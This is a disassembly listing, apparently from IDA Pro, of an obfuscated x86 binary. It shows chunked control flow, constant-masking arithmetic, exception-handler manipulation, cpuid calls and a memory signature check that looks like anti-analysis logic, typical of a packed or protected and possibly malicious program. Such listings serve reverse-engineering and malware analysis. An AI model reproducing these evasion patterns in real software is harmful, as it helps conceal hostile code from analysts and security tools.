; START OF FUNCTION CHUNK FOR sub_42C057
loc_4226C6: ; CODE XREF: sub_42C057:loc_425261�j
sub edx, esi
jmp loc_42AF12
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
ror ecx, 10h
jmp loc_426807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4226D5: ; CODE XREF: sub_421402+3C27�j
push 0E0501894h
pop ebx
add ebx, 1FF23FEFh
xchg ebx, [esp+10h+var_10]
jmp loc_4257B2
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
jmp loc_42C4DF
; ---------------------------------------------------------------------------
pop large dword ptr fs:0
add esp, 4
; START OF FUNCTION CHUNK FOR sub_423C3E
loc_4226F8: ; CODE XREF: sub_423C3E:loc_42AE03�j
pop ecx
pop ecx
pop ebp
jmp loc_421FA3
; END OF FUNCTION CHUNK FOR sub_423C3E
; ---------------------------------------------------------------------------
loc_422700: ; CODE XREF: _94j21ax3:00422E24�j
test eax, ebp
jmp loc_421966
; =============== S U B R O U T I N E =======================================
sub_422707 proc near ; CODE XREF: sub_426C51+3�p
call sub_4254AE
sub_422707 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42270C proc near ; CODE XREF: _94j21ax3:004221F1�j
; sub_42BEFA:loc_42BF04�p
; FUNCTION CHUNK AT 00421E14 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004227E7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00423148 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424E5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042562A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428217 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A861 SIZE 0000000E BYTES
mov [esp+0], ecx
pop ecx
mov eax, [eax]
or eax, eax
jnz loc_421E14
jmp loc_42562A
sub_42270C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pushf
jmp sub_4237DC
; ---------------------------------------------------------------------------
mov edx, 19EDC823h
push offset loc_4244C1
jmp locret_427D2E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_422734: ; CODE XREF: sub_423324+5B�j
xchg eax, ecx
sub edi, eax
and esi, edi
loc_42273A: ; CODE XREF: sub_42C3BD:loc_42B303�j
mov eax, 63h
push edi
push 0A232DFF0h
jmp loc_424798
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_42274A: ; CODE XREF: _94j21ax3:0042929B�j
jnb loc_42A0E5
; =============== S U B R O U T I N E =======================================
sub_422750 proc near ; CODE XREF: sub_422CA6:loc_42AD44�p
mov [esp+0], ecx
pop ecx
call nullsub_146
retn
sub_422750 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42275A: ; CODE XREF: sub_42484C+180�j
jmp loc_42B370
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42275F: ; CODE XREF: sub_423FCD-266C�j
jmp nullsub_174
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_422764 proc near ; CODE XREF: _94j21ax3:004257D6�j
; sub_42A0CC:loc_429171�p
; FUNCTION CHUNK AT 00421AF3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042395A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426F0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427992 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429E69 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AEAD SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
push ebx
push 0B8D7B585h
jmp loc_42395A
sub_422764 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_422773: ; CODE XREF: sub_4259BF+2CB3�j
jge loc_4265F4
jmp loc_421BD9
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
loc_42277E: ; DATA XREF: sub_429862-1E44�o
add dword ptr [ebp-8], 4
jmp loc_425061
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_422787: ; CODE XREF: sub_429862-1E4A�j
add [ebp+var_8], 2
jmp loc_425061
; END OF FUNCTION CHUNK FOR sub_429862
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422790 proc near ; CODE XREF: sub_42764C+7�p
; sub_421D33:loc_42B5EC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00421980 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426C3D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042864B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00428FE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8D6 SIZE 00000008 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
jmp loc_42AB2B
sub_422790 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_4227A1: ; CODE XREF: _94j21ax3:00427139�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4227A2: ; CODE XREF: sub_42284F+2EE7�j
jmp loc_428F2E
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421142
loc_4227A7: ; CODE XREF: sub_421142+7�j
jmp loc_4242C4
; END OF FUNCTION CHUNK FOR sub_421142
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_4227AC: ; CODE XREF: sub_42B238-2EA0�j
jns loc_425B72
mov ebp, 122852DFh
jmp loc_42C0CF
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
add edi, ebp
xchg ecx, [ebx]
jmp sub_425475
; ---------------------------------------------------------------------------
loc_4227C5: ; CODE XREF: _94j21ax3:00426FD6�j
jns loc_425341
sbb ecx, 35679B04h
adc edx, 4082095Bh
jmp loc_424041
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4227DC: ; CODE XREF: sub_4272E9:loc_42B9E3�j
jnz loc_42A4C6
jmp loc_42A573
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42270C
loc_4227E7: ; CODE XREF: sub_42270C:loc_424E5F�j
mov esi, offset sub_4227F5
xchg esi, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421330
loc_4227F0: ; CODE XREF: sub_421330+7DF7�j
jmp loc_4279D7
; END OF FUNCTION CHUNK FOR sub_421330
; =============== S U B R O U T I N E =======================================
sub_4227F5 proc near ; DATA XREF: sub_42270C:loc_4227E7�o
; FUNCTION CHUNK AT 004212F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424566 SIZE 0000000A BYTES
rol esi, 18h
jmp loc_4212F0
sub_4227F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_4227FD: ; CODE XREF: sub_42B9CF-6151�j
sub ecx, 246A6247h
pop edx
jmp loc_42183B
; END OF FUNCTION CHUNK FOR sub_42B9CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_42280A: ; CODE XREF: sub_421402+6BD0�j
; sub_42A8BB+7E5�j
jmp loc_4229C6
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_422810: ; CODE XREF: _94j21ax3:004250CB�j
jmp loc_42410D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422815 proc near ; CODE XREF: sub_423F7F+5986�j
push ebp
mov ebp, esp
loc_422818: ; CODE XREF: _94j21ax3:00422A3C�j
call sub_423C3E
sub_422815 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422048
loc_42281D: ; CODE XREF: sub_422048+50C1�j
jmp nullsub_46
; END OF FUNCTION CHUNK FOR sub_422048
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_422823: ; CODE XREF: sub_4294B3-450D�j
jmp loc_4218DE
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F65
loc_422828: ; CODE XREF: sub_428F65-4574�j
jmp loc_422930
; END OF FUNCTION CHUNK FOR sub_428F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9E8
loc_42282D: ; CODE XREF: sub_42B9E8+1�j
push 0
call sub_42936F
push eax
call sub_42283B
retn
; END OF FUNCTION CHUNK FOR sub_42B9E8
; =============== S U B R O U T I N E =======================================
sub_42283B proc near ; CODE XREF: sub_42B9E8-91B3�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004257F3 SIZE 00000015 BYTES
call sub_422CC1
loc_422840: ; CODE XREF: sub_425A09:loc_427838�j
push ecx
mov [ebp-4], eax
push eax
push 1BC1EE20h
loc_42284A: ; CODE XREF: sub_423324:loc_423379�j
jmp loc_4257F3
sub_42283B endp
; =============== S U B R O U T I N E =======================================
sub_42284F proc near ; CODE XREF: sub_424B01+4EF8�p
; _94j21ax3:0042AEEE�j
; FUNCTION CHUNK AT 00421105 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421221 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004214C0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00421526 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00421599 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00421776 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004219A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421B77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421B98 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00421F1C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00422115 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042236A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004224A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004227A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422882 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00422A9A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00422EC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422F9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423028 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004230C9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004232A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423572 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004236F8 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042376A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00423946 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042397F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424048 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424354 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004245EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042485B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424B1A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424CBF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424CDC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042557D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004256A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425702 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 00425784 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004258D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426480 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F12 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004270AE SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004270EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004272F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004274C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004274EC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427536 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427BB3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427EEB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428073 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428160 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428A15 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428E91 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428F2E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00429022 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004291A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429473 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004296DC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00429D5D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429E74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A165 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A46E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A50C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A55D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042A6CD SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042A930 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AB48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB95 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042ADF8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AE83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B601 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B7DD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042BAB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BD2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BEAC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C03A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C531 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
xor ecx, ecx
xor edx, edx
cpuid
jmp loc_425702
sub_42284F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ror ebx, 0Eh
jmp sub_423324
; =============== S U B R O U T I N E =======================================
sub_422866 proc near ; CODE XREF: _94j21ax3:0042521E�p
; _94j21ax3:0042B135�j
; FUNCTION CHUNK AT 00421E23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421EFA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422288 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423002 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423C17 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042486B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424EC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004251B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00426955 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00429515 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00429E97 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042A170 SIZE 0000000B BYTES
mov [esp+0], eax
pop eax
push eax
call sub_426B87
test eax, eax
jmp loc_421E23
sub_422866 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_422877: ; CODE XREF: _94j21ax3:0042858E�j
adc ebp, 45D8F4DFh
jmp loc_4284DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_422882: ; CODE XREF: sub_42284F+8DB4�j
jbe sub_4281A5
jz loc_428A15
jmp loc_42A55D
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
call sub_422A67
; =============== S U B R O U T I N E =======================================
sub_422898 proc near ; CODE XREF: _94j21ax3:0042A289�j
; sub_42B1F2�p
var_8 = dword ptr -8
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00421F6A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042385B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042434F SIZE 00000005 BYTES
mov [esp+8+var_8], edx
pop edx
call sub_42C0BC
jno loc_421F6A
pushf
mov [esp+8+var_8], ecx
mov ecx, [esp+8+arg_4]
jmp loc_428EE8
sub_422898 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_4228B4: ; CODE XREF: sub_424C37+720F�j
xchg eax, esi
push esi
xchg eax, esi
push 82DE435Ah
add [esp+8+var_8], 7D21BDA6h
jmp loc_42A1AA
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
loc_4228CA: ; CODE XREF: _94j21ax3:0042727F�j
push 8F64D883h
mov ecx, 9E25AE62h
xor eax, 1180F137h
cmp ecx, ebx
jmp loc_42141C
; ---------------------------------------------------------------------------
shr eax, 7
jmp sub_42678A
; ---------------------------------------------------------------------------
loc_4228E9: ; CODE XREF: _94j21ax3:0042971D�j
mov dword ptr [ecx], 10001h
lea eax, sub_4228FF
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4228FF proc near ; DATA XREF: _94j21ax3:004228EF�o
; sub_428BBD:loc_42AD7B�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424249 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00424582 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004259E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426D78 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004279F0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428CD5 SIZE 00000005 BYTES
pop large dword ptr fs:0
jmp loc_424249
sub_4228FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42290B: ; DATA XREF: sub_4252BD+10�o
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_42291D
loc_42290D: ; CODE XREF: sub_42291D+9054�j
pop large dword ptr fs:0
add esp, 4
retn
; END OF FUNCTION CHUNK FOR sub_42291D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427565
loc_422918: ; CODE XREF: sub_427565+B�j
jmp nullsub_47
; END OF FUNCTION CHUNK FOR sub_427565
; =============== S U B R O U T I N E =======================================
sub_42291D proc near ; CODE XREF: sub_4252BD�p
; FUNCTION CHUNK AT 0042290D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042517A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B96A SIZE 0000000C BYTES
push large dword ptr fs:0
mov large fs:0, esp
jmp loc_42517A
sub_42291D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F65
loc_422930: ; CODE XREF: sub_428F65:loc_422828�j
push 916DC9A3h
pop eax
and eax, ds:4000F0h
xor eax, 49545A47h
loc_422942: ; CODE XREF: _94j21ax3:loc_42C5FB�j
test eax, 2000000h
jmp loc_428E78
; END OF FUNCTION CHUNK FOR sub_428F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4214E6
loc_42294D: ; CODE XREF: sub_4214E6+D�j
mov eax, [eax]
push eax
call sub_42BA8A
cmp dword ptr [ebp-0Ch], 0
jz loc_42B27B
jmp loc_4290DF
; END OF FUNCTION CHUNK FOR sub_4214E6
; ---------------------------------------------------------------------------
xor edx, 86CD35F6h
jmp sub_421558
; =============== S U B R O U T I N E =======================================
sub_42296F proc near ; CODE XREF: sub_42430C:loc_423A28�p
mov [esp+0], eax
retn
sub_42296F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422973 proc near ; CODE XREF: sub_423324-1C20�p
; sub_423324+455D�j
; FUNCTION CHUNK AT 004217A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425210 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426431 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042710E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004285E6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042882E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00429C16 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A9B2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B660 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042BB18 SIZE 0000001B BYTES
push edx
mov [esp+0], ebp
mov ebp, esp
push ecx
cmp ds:dword_429F74, 0
jnz loc_42A9B2
jmp loc_42BB18
sub_422973 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
js loc_423D03
jmp loc_424C35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_422997: ; CODE XREF: sub_424C37-1AC4�j
; DATA XREF: sub_42A8BB-3AD3�o
add eax, 0B9D905E6h
cmp dword ptr [eax], 47424454h
jz loc_42A566
jmp loc_423CDD
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_4229AE: ; CODE XREF: _94j21ax3:00424711�j
; sub_42C1AE-35AF�j
rol eax, 4
xor eax, 0FD1FECD7h
and edx, eax
xchg edi, [esp+0]
call sub_427D65
; END OF FUNCTION CHUNK FOR sub_42C1AE
; START OF FUNCTION CHUNK FOR sub_427D53
loc_4229C1: ; CODE XREF: sub_427D53-5F12�j
jmp sub_42463C
; END OF FUNCTION CHUNK FOR sub_427D53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4229C6: ; CODE XREF: sub_421402:loc_42280A�j
jz loc_4284D5
jmp loc_428FB3
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
call sub_42C057
test al, al
jz loc_422120
push eax
push 7582E9F5h
pop eax
jmp loc_429113
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_4229EA: ; CODE XREF: sub_429862-5FC1�j
jnz loc_4299AB
jmp loc_42765D
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
loc_4229F5: ; CODE XREF: _94j21ax3:0042C170�j
jnp loc_424B49
; =============== S U B R O U T I N E =======================================
sub_4229FB proc near ; CODE XREF: _94j21ax3:00422616�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00427A28 SIZE 0000001A BYTES
mov [esp+0], edx
pop edx
push 7CF340E9h
pop ecx
jmp loc_427A28
sub_4229FB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423081
loc_422A0A: ; CODE XREF: sub_423081:loc_422DD9�j
jl loc_42C606
loc_422A10: ; CODE XREF: sub_42484C-CE9�j
jmp loc_42C1A3
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
jo loc_427F35
jmp loc_42C385
; =============== S U B R O U T I N E =======================================
sub_422A20 proc near ; CODE XREF: sub_4249A9-2DF0�p
; FUNCTION CHUNK AT 00422414 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042749D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004282EB SIZE 00000005 BYTES
mov [esp+0], eax
push 4
push 3C1A3556h
pop eax
or eax, 311EFBE0h
and eax, 0A19F08FEh
jmp loc_422414
sub_422A20 endp
; ---------------------------------------------------------------------------
jo loc_422818
jmp sub_427679
; ---------------------------------------------------------------------------
loc_422A47: ; DATA XREF: sub_429CAE:loc_428F91�o
call sub_428B74
mov ds:dword_42C208, eax
xor eax, eax
mov [ebp-4], eax
; START OF FUNCTION CHUNK FOR sub_423614
loc_422A56: ; CODE XREF: sub_42B238-4CB2�j
; sub_423614+8EFB�j
jo loc_4251E8
push 351C7CD2h
pop eax
jmp loc_42BCC0
; END OF FUNCTION CHUNK FOR sub_423614
; =============== S U B R O U T I N E =======================================
sub_422A67 proc near ; CODE XREF: _94j21ax3:00422893�p
; FUNCTION CHUNK AT 00424E94 SIZE 00000005 BYTES
xchg eax, [esp+0]
mov eax, [esp+0]
ror eax, 10h
mov ds:dword_425BC4, eax
jmp loc_424E94
sub_422A67 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_422A7B: ; CODE XREF: sub_42B238-4CAC�j
jz loc_42C0D5
jmp loc_42AA5A
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_422A86: ; CODE XREF: sub_4294B3-2A3�j
cmp edi, edx
jmp loc_42847A
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
test eax, eax
jz loc_421242
jmp loc_42A9CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_422A9A: ; CODE XREF: sub_42284F+F35�j
mov edx, eax
loc_422A9C: ; CODE XREF: sub_42284F:loc_4270EF�j
lea eax, [ebp-2AAh]
cmp dword ptr [eax], 47424454h
jz loc_42A566
jmp loc_421B77
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_422AB3: ; CODE XREF: sub_423FCD+5969�j
js loc_4241FF
shr eax, 16h
pop ecx
jmp loc_423E8E
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_422AC2: ; DATA XREF: sub_42106D+7D4C�o
xchg eax, [esp]
mov ebp, eax
mov eax, offset sub_422AD5
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_422AD0: ; CODE XREF: sub_423324+8619�j
jmp loc_422B27
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_422AD5 proc near ; DATA XREF: _94j21ax3:00422AC7�o
; FUNCTION CHUNK AT 0042110F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004255BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004264C2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426591 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427B2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042936A SIZE 00000005 BYTES
mov eax, ds:dword_429F84
or eax, eax
jnz loc_426F0F
jmp loc_4255BA
sub_422AD5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_422AE8: ; CODE XREF: _94j21ax3:004259FE�j
jnp sub_421C84
adc edx, edi
; START OF FUNCTION CHUNK FOR sub_423081
loc_422AF0: ; CODE XREF: sub_423081:loc_4259F0�j
or eax, 9064288Fh
jnz loc_422DD4
loc_422AFC: ; CODE XREF: sub_426A9F:loc_428777�j
; _94j21ax3:loc_42A7F6�j
jmp loc_423047
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_422B01: ; CODE XREF: sub_42C24F-69A6�j
jmp loc_424002
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_422B06: ; CODE XREF: sub_4272E9-3871�j
jmp loc_426DF2
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
xchg esi, [eax]
jmp loc_422DCC
; =============== S U B R O U T I N E =======================================
sub_422B12 proc near ; CODE XREF: sub_421F28+59F4�p
xchg eax, [esp+0]
mov eax, [esp+0]
ror eax, 0Fh
push ecx
push offset loc_4277E8
jmp nullsub_15
sub_422B12 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_422B27: ; CODE XREF: sub_423324:loc_422AD0�j
pop esi
mov eax, [eax]
push eax
push 33A3E833h
mov [esp+20h+var_20], ecx
push 491B6C12h
pop ecx
or ecx, 0A7A47158h
jmp loc_429A45
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_422B44: ; CODE XREF: sub_42B856:loc_421C9E�j
jnz loc_42ACD9
jmp loc_424950
; END OF FUNCTION CHUNK FOR sub_42B856
; =============== S U B R O U T I N E =======================================
sub_422B4F proc near ; CODE XREF: sub_428090+D�p
; _94j21ax3:004290AD�j
xchg ebx, [esp+0]
pop ebx
